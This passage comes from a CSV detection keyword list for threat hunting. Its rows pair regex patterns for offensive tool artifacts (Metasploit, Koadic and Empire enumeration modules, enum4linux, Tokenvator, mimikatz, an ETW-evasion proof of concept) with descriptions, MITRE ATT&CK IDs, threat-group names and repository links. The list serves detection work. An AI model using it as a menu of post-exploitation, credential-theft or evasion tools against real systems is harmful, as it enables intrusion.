MAZE - LockBit - Bassterlord* - Conti - Hive - Fog - Black Basta - MoneyTaker - INDRIK SPIDER - APT39 - GOLD DUPONT - Common Raven","Framework","https://github.com/rapid7/metasploit-framework","1","1","N/A","N/A","10","10","35400","14272","2025-04-22T20:14:59Z","2011-08-30T06:13:20Z","43188"
"*enum_domain_info.py*",".{0,1000}enum_domain_info\.py.{0,1000}","offensive_tool_keyword","koadic","Koadic. or COM Command & Control. is a Windows post-exploitation rootkit similar to other penetration testing tools such as Meterpreter and Powershell Empire. The major difference is that Koadic does most of its operations using Windows Script Host (a.k.a. JScript/VBScript). with compatibility in the core to support a default installation of Windows 2000 with no service packs (and potentially even versions of NT4) all the way through Windows 10.","T1548.002 - T1071.001 - T1547.001 - T1115 - T1059.001 - T1059.003 - T1059.005 - T1005 - T1573.002 - T1083 - T1564.003 - T1105 - T1046 - T1135 - T1003.002 - T1003.003 - T1055.001 - T1021.001 - T1053.005 - T1218.005 - T1218.010 - T1218.011 - T1082 - T1016 - T1033 - T1569.002 - T1047","TA0004 - TA0011 - TA0003 - TA0008 - TA0002 - TA0009 - TA0010 - TA0005 - TA0006 - TA0007","N/A","PYSA - BlackCat - Black Basta - LockBit - APT28 - LazyScripter - Sidewinder - MuddyWater - FANCY BEAR","C2","https://github.com/offsecginger/koadic","1","1","N/A","N/A","10","10","290","83","2022-01-03T01:07:01Z","2022-01-03T01:05:43Z","43189"
"*enum_enumdomusers(*",".{0,1000}enum_enumdomusers\(.{0,1000}","offensive_tool_keyword","nullinux","Internal penetration testing tool for Linux that can be used to enumerate OS information/domain information/ shares/ directories and users through SMB.","T1087 - T1016 - T1077 - T1018","TA0007 - TA0006","N/A","N/A","Discovery","https://github.com/m8sec/nullinux","1","0","#linux","N/A","7","6","575","101","2024-06-19T14:29:09Z","2016-04-28T16:45:02Z","43190"
"*enum_firefox.rb*",".{0,1000}enum_firefox\.rb.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","FANCY BEAR - EMBER BEAR - Sandworm - Turla - MAZE - LockBit - Bassterlord* - Conti - Hive - Fog - Black Basta - MoneyTaker - INDRIK SPIDER - APT39 - GOLD DUPONT - Common Raven","Framework","https://github.com/rapid7/metasploit-framework","1","1","N/A","N/A","10","10","35400","14272","2025-04-22T20:14:59Z","2011-08-30T06:13:20Z","43191"
"*enum_hostfile.md*",".{0,1000}enum_hostfile\.md.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","FANCY BEAR - EMBER BEAR - Sandworm - Turla - MAZE - LockBit - Bassterlord* - Conti - Hive - Fog - Black Basta - MoneyTaker - INDRIK SPIDER - APT39 - GOLD DUPONT - Common Raven","Framework","https://github.com/rapid7/metasploit-framework","1","1","N/A","N/A","10","10","35400","14272","2025-04-22T20:14:59Z","2011-08-30T06:13:20Z","43192"
"*enum_logged_on_users*",".{0,1000}enum_logged_on_users.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","FANCY BEAR - EMBER BEAR - Sandworm - Turla - MAZE - LockBit - Bassterlord* - Conti - Hive - Fog - Black Basta - MoneyTaker - INDRIK SPIDER - APT39 - GOLD DUPONT - Common Raven","Framework","https://github.com/rapid7/metasploit-framework","1","1","N/A","N/A","10","10","35400","14272","2025-04-22T20:14:59Z","2011-08-30T06:13:20Z","43193"
"*enum_logged_on_users.*",".{0,1000}enum_logged_on_users\..{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","FANCY BEAR - EMBER BEAR - Sandworm - Turla - MAZE - LockBit - Bassterlord* - Conti - Hive - Fog - Black Basta - MoneyTaker - INDRIK SPIDER - APT39 - GOLD DUPONT - Common Raven","Framework","https://github.com/rapid7/metasploit-framework","1","1","N/A","N/A","10","10","35400","14272","2025-04-22T20:14:59Z","2011-08-30T06:13:20Z","43194"
"*enum_mikrotik.md*",".{0,1000}enum_mikrotik\.md.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","FANCY BEAR - EMBER BEAR - Sandworm - Turla - MAZE - LockBit - Bassterlord* - Conti - Hive - Fog - Black Basta - MoneyTaker - INDRIK SPIDER - APT39 - GOLD DUPONT - Common Raven","Framework","https://github.com/rapid7/metasploit-framework","1","1","N/A","N/A","10","10","35400","14272","2025-04-22T20:14:59Z","2011-08-30T06:13:20Z","43195"
"*enum_ms_product_keys.*",".{0,1000}enum_ms_product_keys\..{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","FANCY BEAR - EMBER BEAR - Sandworm - Turla - MAZE - LockBit - Bassterlord* - Conti - Hive - Fog - Black Basta - MoneyTaker - INDRIK SPIDER - APT39 - GOLD DUPONT - Common Raven","Framework","https://github.com/rapid7/metasploit-framework","1","1","N/A","N/A","10","10","35400","14272","2025-04-22T20:14:59Z","2011-08-30T06:13:20Z","43196"
"*enum_printers.py*",".{0,1000}enum_printers\.py.{0,1000}","offensive_tool_keyword","koadic","Koadic. or COM Command & Control. is a Windows post-exploitation rootkit similar to other penetration testing tools such as Meterpreter and Powershell Empire. The major difference is that Koadic does most of its operations using Windows Script Host (a.k.a. JScript/VBScript). with compatibility in the core to support a default installation of Windows 2000 with no service packs (and potentially even versions of NT4) all the way through Windows 10.","T1548.002 - T1071.001 - T1547.001 - T1115 - T1059.001 - T1059.003 - T1059.005 - T1005 - T1573.002 - T1083 - T1564.003 - T1105 - T1046 - T1135 - T1003.002 - T1003.003 - T1055.001 - T1021.001 - T1053.005 - T1218.005 - T1218.010 - T1218.011 - T1082 - T1016 - T1033 - T1569.002 - T1047","TA0004 - TA0011 - TA0003 - TA0008 - TA0002 - TA0009 - TA0010 - TA0005 - TA0006 - TA0007","N/A","PYSA - BlackCat - Black Basta - LockBit - APT28 - LazyScripter - Sidewinder - MuddyWater - FANCY BEAR","C2","https://github.com/offsecginger/koadic","1","1","N/A","N/A","10","10","290","83","2022-01-03T01:07:01Z","2022-01-03T01:05:43Z","43197"
"*enum_shares.py*",".{0,1000}enum_shares\.py.{0,1000}","offensive_tool_keyword","koadic","Koadic. or COM Command & Control. is a Windows post-exploitation rootkit similar to other penetration testing tools such as Meterpreter and Powershell Empire. The major difference is that Koadic does most of its operations using Windows Script Host (a.k.a. JScript/VBScript). with compatibility in the core to support a default installation of Windows 2000 with no service packs (and potentially even versions of NT4) all the way through Windows 10.","T1548.002 - T1071.001 - T1547.001 - T1115 - T1059.001 - T1059.003 - T1059.005 - T1005 - T1573.002 - T1083 - T1564.003 - T1105 - T1046 - T1135 - T1003.002 - T1003.003 - T1055.001 - T1021.001 - T1053.005 - T1218.005 - T1218.010 - T1218.011 - T1082 - T1016 - T1033 - T1569.002 - T1047","TA0004 - TA0011 - TA0003 - TA0008 - TA0002 - TA0009 - TA0010 - TA0005 - TA0006 - TA0007","N/A","PYSA - BlackCat - Black Basta - LockBit - APT28 - LazyScripter - Sidewinder - MuddyWater - FANCY BEAR","C2","https://github.com/offsecginger/koadic","1","1","N/A","N/A","10","10","290","83","2022-01-03T01:07:01Z","2022-01-03T01:05:43Z","43198"
"*enum_shares.rb*",".{0,1000}enum_shares\.rb.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","FANCY BEAR - EMBER BEAR - Sandworm - Turla - MAZE - LockBit - Bassterlord* - Conti - Hive - Fog - Black Basta - MoneyTaker - INDRIK SPIDER - APT39 - GOLD DUPONT - Common Raven","Framework","https://github.com/rapid7/metasploit-framework","1","1","N/A","N/A","10","10","35400","14272","2025-04-22T20:14:59Z","2011-08-30T06:13:20Z","43199"
"*enum_vmware.rb*",".{0,1000}enum_vmware\.rb.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","FANCY BEAR - EMBER BEAR - Sandworm - Turla - MAZE - LockBit - Bassterlord* - Conti - Hive - Fog - Black Basta - MoneyTaker - INDRIK SPIDER - APT39 - GOLD DUPONT - Common Raven","Framework","https://github.com/rapid7/metasploit-framework","1","1","N/A","N/A","10","10","35400","14272","2025-04-22T20:14:59Z","2011-08-30T06:13:20Z","43200"
"*enum_vyos.md*",".{0,1000}enum_vyos\.md.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","FANCY BEAR - EMBER BEAR - Sandworm - Turla - MAZE - LockBit - Bassterlord* - Conti - Hive - Fog - Black Basta - MoneyTaker - INDRIK SPIDER - APT39 - GOLD DUPONT - Common Raven","Framework","https://github.com/rapid7/metasploit-framework","1","1","N/A","N/A","10","10","35400","14272","2025-04-22T20:14:59Z","2011-08-30T06:13:20Z","43201"
"*enum4linux*",".{0,1000}enum4linux.{0,1000}","offensive_tool_keyword","enum4linux","Enum4linux is a tool for enumerating information from Windows and Samba systems. It attempts to offer similar functionality to enum.exe ","T1018 - T1087.002 - T1135 - T1049 - T1033","TA0007 - TA0009","N/A","N/A","Reconnaissance","https://github.com/CiscoCXSecurity/enum4linux","1","0","#linux","N/A","N/A","10","1260","243","2024-10-11T14:41:57Z","2015-07-31T21:06:03Z","43202"
"*enum4linux_*.txt*",".{0,1000}enum4linux_.{0,1000}\.txt.{0,1000}","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Black Basta","Discovery","https://github.com/lefayjey/linWinPwn","1","1","#linux","N/A","10","10","1953","283","2025-04-15T14:51:50Z","2021-12-16T22:13:10Z","43203"
"*enum4linux-ng -A -u *",".{0,1000}enum4linux\-ng\s\-A\s\-u\s.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559","TA0043 - TA0002 - TA0004 - TA0011 - TA0003","N/A","Black Basta","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","#linux","N/A","10","10","2354","209","2025-04-09T16:56:24Z","2020-03-09T19:12:11Z","43204"
"*Enum-AllTokens*",".{0,1000}Enum\-AllTokens.{0,1000}","offensive_tool_keyword","empire","Empire commands. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1155","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - BlackCat - CL0P - Conti - CopyKittens - FIN10 - FIN13 - HEXANE - Hive - Indrik Spider - LazyScripter - Leviathan - LockBit - MuddyWater - PYSA - Silence - Turla - Vice Society - WIRTE - Wizard Spider - CopyKittens - INDRIK SPIDER","Framework","https://github.com/EmpireProject/Empire","1","0","N/A","N/A","10","10","7589","2850","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z","43205"
"*EnumCLR.exe*",".{0,1000}EnumCLR\.exe.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobalt Strike BOF to identify processes with the CLR loaded with a goal of identifying SpawnTo / injection candidates.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://gist.github.com/G0ldenGunSec/8ca0e853dd5637af2881697f8de6aecc","1","1","N/A","N/A","10","10","N/A","N/A","N/A","N/A","43206"
"*Enum-Creds*",".{0,1000}Enum\-Creds.{0,1000}","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - BlackCat - CL0P - Conti - CopyKittens - FIN10 - FIN13 - HEXANE - Hive - Indrik Spider - LazyScripter - Leviathan - LockBit - MuddyWater - PYSA - Silence - Turla - Vice Society - WIRTE - Wizard Spider - CopyKittens - INDRIK SPIDER - Black Basta","Framework","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","10","7589","2850","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z","43207"
"*enumdomains;quit*",".{0,1000}enumdomains\;quit.{0,1000}","offensive_tool_keyword","arsenal","Arsenal is just a quick inventory and launcher for hacking programs","T1596 - T1587","TA0042 - TA0001","N/A","N/A","Exploitation tool","https://github.com/Orange-Cyberdefense/arsenal","1","0","N/A","commands cheat sheets","8","10","3399","511","2024-11-29T14:48:20Z","2020-09-02T13:24:50Z","43208"
"*enumdomgroups;quit*",".{0,1000}enumdomgroups\;quit.{0,1000}","offensive_tool_keyword","arsenal","Arsenal is just a quick inventory and launcher for hacking programs","T1596 - T1587","TA0042 - TA0001","N/A","N/A","Exploitation tool","https://github.com/Orange-Cyberdefense/arsenal","1","0","N/A","commands cheat sheets","8","10","3399","511","2024-11-29T14:48:20Z","2020-09-02T13:24:50Z","43209"
"*enumdomusers;quit*",".{0,1000}enumdomusers\;quit.{0,1000}","offensive_tool_keyword","arsenal","Arsenal is just a quick inventory and launcher for hacking programs","T1596 - T1587","TA0042 - TA0001","N/A","N/A","Exploitation tool","https://github.com/Orange-Cyberdefense/arsenal","1","0","N/A","commands cheat sheets","8","10","3399","511","2024-11-29T14:48:20Z","2020-09-02T13:24:50Z","43210"
"*enumerate.cna*",".{0,1000}enumerate\.cna.{0,1000}","offensive_tool_keyword","red-team-scripts","Cobalt Strike Aggressor script function and alias to perform some rudimentary Windows host enumeration with Beacon built-in commands (i.e. no Powershell. binary calls. or process injection). Additionally. adds a basic enumerate alias for Linux based systems in SSH sessions.","T1595","TA0007","N/A","N/A","Reconnaissance","https://github.com/threatexpress/red-team-scripts","1","1","N/A","N/A","N/A","10","1122","195","2024-11-19T19:39:01Z","2017-05-01T13:53:05Z","43211"
"*EnumerateAllDomainControllers*",".{0,1000}EnumerateAllDomainControllers.{0,1000}","offensive_tool_keyword","SlinkyCat","This script performs a series of AD enumeration tasks","T1087.002 - T1018 - T1069.002","TA0007 - TA0009","N/A","N/A","Discovery","https://github.com/LaresLLC/SlinkyCat","1","0","N/A","AD Enumeration","7","1","79","8","2023-07-12T15:29:31Z","2023-07-03T23:44:18Z","43212"
"*Enumerate-AllHighPrivilegePrincipals*",".{0,1000}Enumerate\-AllHighPrivilegePrincipals.{0,1000}","offensive_tool_keyword","Azure-AccessPermissions","Easy to use PowerShell script to enumerate access permissions in an Azure Active Directory environment.","T1087.002 - T1018 - T1069.002","TA0007 - TA0009","N/A","N/A","Discovery","https://github.com/csandker/Azure-AccessPermissions","1","0","N/A","AD Enumeration","6","2","108","18","2023-02-21T06:46:24Z","2022-10-19T10:33:24Z","43213"
"*EnumerateDomainGpo*",".{0,1000}EnumerateDomainGpo.{0,1000}","offensive_tool_keyword","Group3r","Find vulnerabilities in AD Group Policy","T1484.002 - T1069.002 - T1087.002","TA0007 - TA0040","N/A","KNOTWEED","Discovery","https://github.com/Group3r/Group3r","1","0","N/A","AD Enumeration","7","8","781","68","2025-04-08T05:03:34Z","2021-07-05T05:05:42Z","43214"
"*Enumerate-MFAStatusOfHighPrivilegePrincipals*",".{0,1000}Enumerate\-MFAStatusOfHighPrivilegePrincipals.{0,1000}","offensive_tool_keyword","Azure-AccessPermissions","Easy to use PowerShell script to enumerate access permissions in an Azure Active Directory environment.","T1087.002 - T1018 - T1069.002","TA0007 - TA0009","N/A","N/A","Discovery","https://github.com/csandker/Azure-AccessPermissions","1","0","N/A","AD Enumeration","6","2","108","18","2023-02-21T06:46:24Z","2022-10-19T10:33:24Z","43215"
"*Enumerating Administrators group, please wait*",".{0,1000}Enumerating\sAdministrators\sgroup,\splease\swait.{0,1000}","offensive_tool_keyword","doucme","leverages the NetUserAdd Win32 API to create a new computer account","T1136 - T1098 - T1078","TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/Ben0xA/DoUCMe","1","0","N/A","N/A","9","1","69","18","2021-05-01T03:15:59Z","2021-04-29T15:41:28Z","43216"
"*Enumerating new user, please wait*",".{0,1000}Enumerating\snew\suser,\splease\swait.{0,1000}","offensive_tool_keyword","doucme","leverages the NetUserAdd Win32 API to create a new computer account","T1136 - T1098 - T1078","TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/Ben0xA/DoUCMe","1","0","N/A","N/A","9","1","69","18","2021-05-01T03:15:59Z","2021-04-29T15:41:28Z","43217"
"*Enumeration.Net.GetNetLocalGroupMembers(*",".{0,1000}Enumeration\.Net\.GetNetLocalGroupMembers\(.{0,1000}","offensive_tool_keyword","SharpSploit","SharpSploit is a .NET post-exploitation library written in C# that aims to highlight the attack surface of .NET and make the use of offensive .NET easier for red teamers.","T1055 - T1086 - T1003 - T1053 - T1547 - T1110 - T1021 - T1070 - T1562 - T1574 - T1543 - T1098","TA0002 - TA0003 - TA0005 - TA0006 - TA0010 - TA0040","N/A","N/A","Exploitation tool","https://github.com/cobbr/SharpSploit","1","0","N/A","N/A","10","10","1789","312","2021-08-12T18:23:15Z","2018-09-20T14:22:37Z","43218"
"*Enumeration/DesktopACL*",".{0,1000}Enumeration\/DesktopACL.{0,1000}","offensive_tool_keyword","Tokenvator","A tool to elevate privilege with Windows Tokens","T1134 - T1078","TA0003 - TA0004","N/A","N/A","Privilege Escalation","https://github.com/0xbadjuju/Tokenvator","1","1","N/A","N/A","N/A","10","1038","201","2023-10-06T13:17:05Z","2017-12-08T01:29:11Z","43219"
"*Enumeration\DesktopAC*",".{0,1000}Enumeration\\DesktopAC.{0,1000}","offensive_tool_keyword","Tokenvator","A tool to elevate privilege with Windows Tokens","T1134 - T1078","TA0003 - TA0004","N/A","N/A","Privilege Escalation","https://github.com/0xbadjuju/Tokenvator","1","0","N/A","N/A","N/A","10","1038","201","2023-10-06T13:17:05Z","2017-12-08T01:29:11Z","43220"
"*--env GOPROXY=https://goproxy.cn*",".{0,1000}\-\-env\sGOPROXY\=https\:\/\/goproxy\.cn.{0,1000}","offensive_tool_keyword","nps","chinese intranet penetration proxy server","T1090 - T1071 - T1102 - T1075 - T1133","TA0002 - TA0011 - TA0010","N/A","N/A","Defense Evasion","https://github.com/yisier/nps","1","0","N/A","N/A","9","10","2674","327","2025-04-17T09:43:50Z","2022-09-14T06:24:00Z","43221"
"*Env:TMP\ACl.log*",".{0,1000}Env\:TMP\\ACl\.log.{0,1000}","offensive_tool_keyword","redpill","Assist reverse tcp shells in post-exploration tasks","T1082 - T1016 - T1049 - T1057 - T1489 - T1070 - T1562 - T1563 - T1119 - T1518 - T1602 - T1530 - T1113 - T1125 - T1105 - T1133 - T1056 - T1114 - T1539 - T1552 - T1214 - T1110 - T1040 - T1436 - T1068 - T1088 - T1564 - T1112 - T1547 - T1574 - T1204 - T1215 - T1046 - T1557 - T1136 - T1059 - T1127 - T1555 - T1548 - T1115 - T1003","TA0007 - TA0003 - TA0005 - TA0009 - TA0002 - TA0006 - TA0004 - TA0010 - TA0011","N/A","N/A","Exploitation tool","https://github.com/r00t-3xp10it/redpill","1","0","N/A","N/A","10","3","218","52","2024-03-19T15:03:16Z","2021-02-20T23:59:07Z","43222"
"*env_var_spoofing_poc.cpp*",".{0,1000}env_var_spoofing_poc\.cpp.{0,1000}","offensive_tool_keyword","ETW","stop ETW from giving up your loaded .NET assemblies to that pesky EDR but can't be bothered patching memory? Just pass COMPlus_ETWEnabled=0 as an environment variable during your CreateProcess call","T1055.001 - T1059.001 - T1562.001","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://gist.github.com/xpn/64e5b6f7ad370c343e3ab7e9f9e22503","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A","43223"
"*eo.oe.kiwi*",".{0,1000}eo\.oe\.kiwi.{0,1000}","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1134.005 - T1098 - T1547.005 - T1555 - T1555.003 - T1555.004 - T1003.001 - T1003.002 - T1003.004 - T1003.006 - T1207 - T1649 - T1558.001 - T1558.002 - T1552.004 - T1550.002 - T1550.003","TA0004 - TA0006 - TA0003 - TA0008 - TA0009","N/A","Black Basta - APT1 - APT24 - APT28 - APT29 - APT32 - APT33 - APT38 - APT39 - APT41 - APT5 - Akira - Avivore  - BERSERK BEAR - BOSS SPIDER - BRONZE BUTLER - BackdoorDiplomacy - Blue Mockingbird - CHRYSENE - COZY BEAR - Carbanak - Chamelgang - Chimera - Cleaver - Cobalt Group - DarkHydrus - Dragonfly - Earth Lusca - FANCY BEAR - FIN13 - FIN6 - FIN7 - GALLIUM - Gamaredon - HEXANE - Indrik Spider - 